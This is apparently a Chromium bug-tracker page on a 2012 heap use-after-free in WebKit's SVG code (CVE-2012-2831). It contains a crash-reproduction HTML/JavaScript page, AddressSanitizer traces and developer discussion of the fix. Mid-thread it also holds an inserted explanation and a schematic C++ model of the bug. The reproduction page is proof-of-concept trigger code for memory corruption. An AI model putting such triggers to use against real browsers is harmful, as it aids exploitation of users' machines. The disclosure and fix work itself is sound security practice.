Status: Fixed
OS: All
Pri: 1
Type: Bug-Security
Heap-use-after-free in WebCore::SVGDocumentExtensions::removeAllElementReferencesForTarget
Reported by miau...@gmail.com, May 30 2012

VULNERABILITY DETAILS
use-after-free in WebCore::SVGDocumentExtensions::removeAllElementReferencesForTarget

VERSION
Chrome Version: dev

Chromium	21.0.1157.0 (Developer Build 139531)
OS	Linux
WebKit	537.1 (@118843)

Operating System: 64bit precise

REPRODUCTION CASE
<html>
  <head>
    <style>
    </style>
    <script>
      onload = function() {
        el0=document.createElementNS('http://www.w3.org/2000/svg', 'svg')
        el0.setAttribute('id','el0')
        document.body.appendChild(el0)

        document.body.appendChild(document.createTextNode('A'))

        el1=document.createElementNS('http://www.w3.org/2000/svg', 'svg')
        el1.setAttribute('id','el1')
        el1.appendChild(document.createTextNode('A'))
        document.body.appendChild(el1)

        document.body.appendChild(document.createTextNode('A'))

        el2=document.createElementNS('http://www.w3.org/2000/svg', 'image')
        el2.setAttribute('id','el2')
        el0.appendChild(el2)

        el3=document.createElementNS('http://www.w3.org/2000/svg', 'textPath')
        el3.setAttributeNS('http://www.w3.org/1999/xlink', 'xlink:href', '#el1')
        el2.appendChild(el3)

        el4=document.createElementNS('http://www.w3.org/2000/svg', 'use')
        el4.setAttributeNS('http://www.w3.org/1999/xlink', 'xlink:href', '#el2')
        el0.appendChild(el4)

        el2.setAttributeNS('http://www.w3.org/1999/xlink', 'xlink:href', '#el0')
        document.designMode='on'
        window.getSelection().setBaseAndExtent(el1, 0, el1, 0)
        document.execCommand('ForwardDelete')
        setTimeout("location.reload()", 10)
      }
    </script>
  </head>
  <body>
  </body>
</html>

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab + asan
Crash State: 


==9219== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffed156480 at pc 0x55555bb9c7b9 bp 0x7fffffff6230 sp 0x7fffffff6228
READ of size 8 at 0x7fffed156480 thread T0
    #0 0x55555bb9c7b9 in WebCore::SVGDocumentExtensions::removeAllElementReferencesForTarget(WebCore::SVGElement*) ???:0
    #1 0x55555bba923e in WebCore::SVGElement::removedFrom(WebCore::ContainerNode*) ???:0
    #2 0x55555bd42d90 in WebCore::SVGStyledElement::removedFrom(WebCore::ContainerNode*) ???:0


0x7fffed156480 is located 0 bytes inside of 392-byte region [0x7fffed156480,0x7fffed156608)
freed by thread T0 here:
    #0 0x55555e5cbd52 in operator delete(void*) ??:0
    #1 0x55555bbb3728 in WebCore::SVGElementInstance::detach() ???:0
    #2 0x55555bbb3246 in WebCore::SVGElementInstance::~SVGElementInstance() ???:0
    #3 0x55555bbb319e in WebCore::SVGElementInstance::~SVGElementInstance() ???:0


Attachments: 0392.txt (12.4 KB), 0392.html (1.4 KB)
Cc: fmalita@chromium.org pdr@chromium.org schenney@chromium.org
Labels: WebKit-SVG
Summary: Heap-use-after-free in WebCore::SVGDocumentExtensions::removeAllElementReferencesForTarget (was: NULL)
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=53433906

Uploader: inferno@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7f9edf9b3c80
Crash State:
  - crash stack -
  WebCore::SVGDocumentExtensions::removeAllElementReferencesForTarget
  WebCore::SVGElement::removedFrom
  - free stack -
  WebCore::SVGElementInstance::detach
  WebCore::SVGElementInstance::~SVGElementInstance
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=139300:139395

Minimized Testcase (1.10 Kb): https://cluster-fuzz.appspot.com/download/AMIfv968MsHol1ezUseel0zNe5P-oaASUNtgTePunUuguxHTOK7rPf9Ru4zchHA_0hpVVeJce2QxCiJW1IxrXN6BK8BCTlov6UkFNI1qHHdwJnyzZrlarRIN0PkPXD1t_VQjgZNyu9r1tn7nrmRmBSIbVYU2gxQj5s66LkRBOnQzYdrOG8X1B9c
Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit OS-All Mstone-21 SecImpacts-None Stability-AddressSanitizer SecSeverity-High
SVG team, please help to find the regressor
Comment 4 by pdr@chromium.org, Jun 1 2012
https://bugs.webkit.org/show_bug.cgi?id=15799 looks like the most probable regressor
Labels: ReleaseBlock-Stable
Status: Available
Thanks Philip. Can you please help to upstream this and poke Rob to fix the regression :)
Comment 6 by pdr@chromium.org, Jun 1 2012
Labels: WebKit-ID-88144
Upstream: https://bugs.webkit.org/show_bug.cgi?id=88144
Owner: pdr@chromium.org
According to https://bugs.webkit.org/show_bug.cgi?id=15799, which is the bug pdr believes is the root cause, the bug should be fixed. We now have that fix in our tree; I can't reproduce the crash on Mac dev or canary, but that doesn't necessarily mean it's really fixed. ClusterFuzz hasn't told us that we are happy yet, so maybe the bug persists?

I hate to be presumptuous, but I also hate to have a release-blocker with no owner, so I'm giving this to pdr. Maybe it'll turn out that you don't need to do anything. And if you're not the right person to take it, can you let us know who is best? Thanks! And, sorry. :)
Comment 8 by pdr@chromium.org, Jun 5 2012
This bug is still present, you need to use an ASAN build to hit it though. Re-pinging rbuis to get this fixed, or I'll pick it up myself if he doesn't respond.
Comment 9 by pdr@chromium.org, Jun 6 2012
I'm now on this bug.
Comment 10 by pdr@chromium.org, Jun 12 2012
Small update: I haven't forgotten about this (it's my top issue).
Comment 11 by pdr@chromium.org, Jun 14 2012
Patch up!
Comment 12 by pdr@chromium.org, Jun 14 2012
@Abhishek, to get this in it needs to be in before tomorrow. Can you review this? Pinging Rob on IRC is not working and Niko is offline.
Labels: Merge-Approved
Status: FixUnreleased
http://trac.webkit.org/changeset/120559. Philip, does this need merging for m20? That function looked old; it might be that some new code just helped to trigger this.
Comment 14 by pdr@chromium.org, Jun 18 2012
I think this does need merging. http://trac.webkit.org/changeset/118609 introduced the textPath regression, but http://trac.webkit.org/changeset/107067 is the real culprit which introduced this new resource handling model. There is almost certainly the same security bug in feImageElement.
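The ASan trace above shows the shape of the bug: a document-wide map from a target element to the elements that reference it is walked in `removeAllElementReferencesForTarget` after one of those referencing elements has already been freed by `SVGElementInstance::detach()`. The following is a schematic C++ model added here to illustrate that pattern and the defensive fix (a referencer unregisters itself before its memory goes away); it is not WebKit's code, and `Registry`, `Element`, `ElementInstance` and `runScenario` are hypothetical names. Only the method name `removeAllElementReferencesForTarget` is taken from the trace.

```cpp
// Schematic model (not WebKit code) of a target -> referencers registry whose
// entries can outlive the referencing element. The hardened form removes the
// referencer from the registry in its destructor so the registry never holds a
// pointer to freed memory. Names and structure are hypothetical.
#include <cstddef>
#include <iterator>
#include <map>
#include <memory>
#include <set>
#include <string>
#include <utility>

class Registry;

// Minimal stand-in for an SVG element that references another element by id.
class Element {
public:
    Element(Registry& registry, std::string id);
    ~Element();  // hardened: unregister before the memory is released
    void setReference(Element* target);
    void clearReference() { m_target = nullptr; }
    Element* reference() const { return m_target; }
    const std::string& id() const { return m_id; }
    static std::size_t liveCount() { return s_live; }
private:
    Registry& m_registry;
    std::string m_id;
    Element* m_target = nullptr;
    static std::size_t s_live;
};
std::size_t Element::s_live = 0;

// Document-wide bookkeeping: target -> set of elements that reference it.
class Registry {
public:
    void addReference(Element* referencer, Element* target) {
        m_referencers[target].insert(referencer);
    }
    // Defensive step: a referencer about to be destroyed drops out of every
    // bucket, so the walk below only ever sees live elements.
    void removeReferencer(Element* referencer) {
        for (auto it = m_referencers.begin(); it != m_referencers.end();) {
            it->second.erase(referencer);
            it = it->second.empty() ? m_referencers.erase(it) : std::next(it);
        }
    }
    // Called when `target` leaves the tree: every referencer drops its pointer.
    // Without removeReferencer() this loop would dereference a freed element,
    // which is the READ the ASan report flags.
    std::size_t removeAllElementReferencesForTarget(Element* target) {
        auto it = m_referencers.find(target);
        if (it == m_referencers.end()) return 0;
        std::size_t cleared = 0;
        for (Element* referencer : it->second) {
            referencer->clearReference();
            ++cleared;
        }
        m_referencers.erase(it);
        return cleared;
    }
    std::size_t bucketCount() const { return m_referencers.size(); }
private:
    std::map<Element*, std::set<Element*>> m_referencers;
};

Element::Element(Registry& registry, std::string id)
    : m_registry(registry), m_id(std::move(id)) { ++s_live; }
Element::~Element() { m_registry.removeReferencer(this); --s_live; }
void Element::setReference(Element* target) {
    m_target = target;
    m_registry.addReference(this, target);
}

// Stand-in for the <use> shadow-tree instance: it owns a cloned element and
// frees it in detach(), the free site named in the trace.
class ElementInstance {
public:
    explicit ElementInstance(std::unique_ptr<Element> shadowElement)
        : m_shadow(std::move(shadowElement)) {}
    void detach() { m_shadow.reset(); }
    ~ElementInstance() { detach(); }
private:
    std::unique_ptr<Element> m_shadow;
};

// Constructed scenario: two referencers of one target, one of them freed by the
// instance tree before the target is removed. Returns how many references the
// registry cleared; 1 means the freed referencer was correctly forgotten.
std::size_t runScenario() {
    Registry registry;
    Element target(registry, "el1");
    Element referencer(registry, "el3");
    referencer.setReference(&target);
    auto shadow = std::make_unique<Element>(registry, "el3-shadow");
    shadow->setReference(&target);
    ElementInstance instance(std::move(shadow));
    instance.detach();  // frees the shadow referencer
    return registry.removeAllElementReferencesForTarget(&target);
}
```

The point of the model is the ownership mismatch: the registry stores raw pointers but does not own the elements, so whichever object frees an element (here the instance tree) must also be responsible for removing it from the registry, or the registry must hold a reference that keeps the element alive.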
Labels: -Mstone-21 -SecImpacts-None Mstone-20 SecImpacts-Stable SecImpacts-Beta
Perfect.
Labels: -Restrict-View-SecurityTeam -Merge-Approved Restrict-View-SecurityNotify Merge-Merged
M20: http://trac.webkit.org/changeset/120762
Labels: reward-topanel
Comment 18 by pdr@chromium.org, Jun 19 2012
Just FYI: This bug also exposed some content model issues in SVG that schenney and I are working on in free time. For instance, you shouldn't be able to have:
<image>
  <textPath/>
</image>
to begin with.
Labels: -reward-topanel reward-1000 reward-unpaid
$1000
Labels: CVE-2012-2831
Labels: -reward-unpaid
Project Member Comment 23 by bugdroid1@chromium.org, Oct 13 2012
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Status: Fixed
Comment 25 by laforge@google.com, Jan 18 2013
Labels: Restrict-View-EditIssue
Project Member Comment 26 by bugdroid1@chromium.org, Mar 10 2013
Labels: -Type-Security -Area-WebKit -WebKit-SVG -Mstone-20 -SecImpacts-Stable -Stability-AddressSanitizer -SecSeverity-High -SecImpacts-Beta Cr-Content M-20 Security-Impact-Stable Security-Impact-Beta Cr-Content-SVG Performance-Memory-AddressSanitizer Type-Bug-Security Security-Severity-High
Project Member Comment 27 by bugdroid1@chromium.org, Mar 14 2013
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue
Project Member Comment 29 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Severity-High Security_Severity-High
Project Member Comment 30 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member Comment 31 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Beta Security_Impact-Beta
Project Member Comment 32 by bugdroid1@chromium.org, Apr 1 2013
Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer
Project Member Comment 33 by bugdroid1@chromium.org, Apr 6 2013
Labels: -Cr-Content Cr-Blink
Project Member Comment 34 by bugdroid1@chromium.org, Apr 6 2013
Labels: -Cr-Content-SVG Cr-Blink-SVG
Project Member Comment 35 by sheriffbot@chromium.org, Jun 14 2016
Labels: -security_impact-beta
Project Member Comment 36 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 37 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic